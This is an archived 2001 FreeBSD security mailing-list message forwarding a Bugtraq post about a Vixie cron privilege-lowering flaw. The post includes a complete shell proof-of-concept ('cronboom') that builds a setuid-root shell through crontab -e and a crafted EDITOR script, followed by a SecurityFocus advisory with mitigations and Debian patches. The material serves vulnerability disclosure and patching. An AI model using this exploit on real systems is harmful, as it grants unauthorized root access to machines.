Date: Tue, 8 May 2001 20:13:07 +0200 From: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu> To: security@freebsd.org Subject: Fwd: Vixie cron vulnerability Message-ID: <20010508201307.A2613@petra.hos.u-szeged.hu>
next in thread | raw e-mail | index | archive | help
Hello, I hate to disturb, but... I cannot reproduce this, but... are we affected? This looks like rather new... ----- Forwarded message from Cade Cairns <cairnsc@SECURITYFOCUS.COM> ----- X-Sender: <cairnsc@mail> Date: Mon, 7 May 2001 16:08:49 -0600 Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Cade Cairns <cairnsc@SECURITYFOCUS.COM> Subject: Vixie cron vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Greetings Bugtraqers, Attached is a simple proof of concept for the vixie cron vulnerability recently published in Debian Security Advisory DSA-054-1. The code was written during SIA analysis of this vulnerability. Further information on the vulnerability may be found in the SecurityFocus SIA commercial alert, also attached to this message. Cade Cairns SecurityFocus http://www.securityfocus.com/ #!/bin/sh # # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1 # # synopsis: # the crontab file maintenance program (crontab) fails to drop privileges # before invoking the editor under certain circumstances. # # description: # a serialization error exists in some versions of the file maintenance # program, crontab. the vulnerability was introduced in versions which # were patched for seperate vulnerability in fall of 2000 (see Bugtraq # ID #1960). # # when a parsing error occurs after a modification operation, crontab will # fail to drop privileges correctly for subsequent modification operations. # because the program is installed setuid root, it may be possible for a # local user to gain root privileges. # # affected versions: # cron_3.0pl1-57.2 distributed with Debian Linux 2.2. # # note that copies of the program with the patch mentioned above are likely # to also be vulnerable. # # references: # http://www.securityfocus.com/bid/2687 # # 05/07/01 cairnsc@securityfocus.com CRONTAB=/usr/bin/crontab if ! test -x $CRONTAB; then echo "** unable to locate crontab executable, exiting" exit 1 fi cat > vcsh.c << EOF #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } EOF echo "** compiling shell wrapper as $PWD/vcsh" cc -o $PWD/vcsh $PWD/vcsh.c if ! test -x $PWD/vcsh; then echo "** compilation failed, exiting" exit 1 fi echo "** creating simple exploit script as $PWD/vcex.sh" cat > vcex.sh << EOF #!/bin/sh sleep 1 && echo "foo" >> \$1 if test -f $PWD/vcboom; then chown root.root $PWD/vcsh chmod 4755 $PWD/vcsh rm $PWD/vcboom else touch $PWD/vcboom fi EOF chmod 0755 $PWD/vcex.sh echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the first prompt, then enter 'no' at the second" echo (EDITOR=$PWD/vcex.sh $CRONTAB -e) echo echo "** done, the shell wrapper should be suid root" exit 0 Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. --------------------------------------------------------------------------- Security Alert Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability BUGTRAQ ID: 2687 CVE ID: CVE-MAP-NOMATCH Published: May 07, 2001 Updated: May 07, 2001 Remote: No Local: Yes Availability: User Initiated Authentication: Not Required Credibility: Vendor Confirmed Ease: Exploit Available Class: Serialization Error Impact: 10.00 Severity: 6.90 Urgency: 7.59 Last Change: Initial analysis. --------------------------------------------------------------------------- Vulnerable Systems: Paul Vixie Vixie Cron 3.0pl1 + Debian Linux 2.2 sparc + Debian Linux 2.2 powerpc + Debian Linux 2.2 arm + Debian Linux 2.2 alpha + Debian Linux 2.2 68k + Debian Linux 2.2 Non-Vulnerable Systems: Summary: Local users can cause Vixie crontab to fail to drop privileges when editing files. Can lead to full system compromise. Impact: Local users can manipulate crontab's lowering of privileges, leading to full system compromise. Technical Description: Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. A serialization error exists in some versions of the crontab file maintenance program. The vulnerability was introduced in versions which were patched for seperate vulnerability in fall of 2000 (see Bugtraq ID #1960). When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. Because the program is installed setuid root, it may be possible for a local user to gain root privileges. Attack Scenarios: An attacker with local access must edit their crontab file and enter a line that causes the parser to fail. The attacker must then enter 'yes' when prompted as to whether he or she wishes to attempt to fix the error in the file. This will cause the editor to be invoked again, but with full privileges. The attacker could then execute arbitrary commands from the editor, or overwrite otherwise protected system files. Exploits: During SIA analysis of this vulnerability, Cade Cairns <cairnsc@securityfocus.com> wrote proof-of-concept exploit code. http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh Mitigating Strategies: Restricting local access to the host may prevent unauthorized users from exploiting this vulnerability. Restrict access to the cron faciliy to trusted users via the /etc/cron.allow and /etc/cron.deny files (man crontab). Solutions: For Paul Vixie Vixie Cron 3.0pl1: Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/cro n_3.0pl1-57.3_alpha.deb Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/cron_ 3.0pl1-57.3_arm.deb Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/cron _3.0pl1-57.3_i386.deb Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/cron _3.0pl1-57.3_m68k.deb Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/c ron_3.0pl1-57.3_powerpc.deb Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/cro n_3.0pl1-57.3_sparc.deb Credit: Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7, 2001. References: advisory: Debian DSA-054-1: cron http://www.securityfocus.com/advisories/3282 ChangeLog: May 07, 2001: Initial analysis. --------------------------------------------------------------------------- HOW TO INTERPRET THIS ALERT BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by SecurityFocus.com. CVE ID: This is a unique identifier assigned to the vulnerability by the CVE. Published: The date the vulnerability was first made public. Updated: The date the information was last updated. Remote: Whether this is a remotely exploitable vulnerability. Local: Whether this is a locally exploitable vulnerability. Credibility: Describes how credible the information about the vulnerability is. Possible values are: Conflicting Reports: The are multiple conflicting about the existance of the vulnerability. Single Source: There is a single non-reliable source reporting the existence of the vulnerability. Reliable Source: There is a single reliable source reporting the existence of the vulnerability. Conflicting Details: There is consensus on the existence of the vulnerability but not it's details. Multiple Sources: There is consensus on the existence and details of the vulnerability. Vendor Confirmed: The vendor has confirmed the vulnerability. Class: The class of vulnerability. Possible values are: Boundary Condition Error, Access Validation Error, Origin Validation Error, Input Valiadtion Error, Failure to Handle Exceptional Conditions, Race Condition Error, Serialization Error, Atomicity Error, Environment Error, and Configuration Error. Ease: Rates how easiliy the vulnerability can be exploited. Possible values are: No Exploit Available, Exploit Available, and No Exploit Required. Impact: Rates the impact of the vulnerability. It's range is 1 through 10. Severity: Rates the severity of the vulnerability. It's range is 1 through 10. It's computed from the impact rating and remote flag. Remote vulnerabiliteis with a high impact rating receive a high severity rating. Local vulnerabilities with a low impact rating receive a low severity rating. Urgency: Rates how quickly you should take action to fix or mitigate the vulnerability. It's range is 1 through 10. It's computed from the severity rating, the ease rating, and the credibility rating. High severity vulnerabilities with a high ease rating, and a high confidence rating have a higher urgency rating. Low severity vulnerabilities with a low ease rating, and a low confidence rating have a lower urgency rating. Last Change: The last change made to the vulnerability information. Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system name indicates that one of the system components is vulnerable vulnerable. For example, Windows 98 ships with Internet Explorer. So if a vulnerability is found in IE you may see something like: Microsoft Internet Explorer + Microsoft Windows 98 Non-Vulnerable Systems: The list of non-vulnerable systems. Summary: A concise summary of the vulnerability. Impact: The impact of the vulnerability. Technical Description: The in-depth description of the vulnerability. Attack Scenarios: Ways an attacker may make use of the vulnerability. Exploits: Exploit intructions or programs. Mitigating Strategies: Ways to mitigate the vulnerability. Solutions: Solutions to the vulnerability. Credit: Information about who disclosed the vulnerability. References: Sources of information on the vulnerability. Related Resources: Resources that might be of additional value. ChangeLog: History of changes to the vulnerability record. --------------------------------------------------------------------------- Copyright 2001 SecurityFocus.com Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage your account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. ----- End forwarded message ----- -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010508201307.A2613>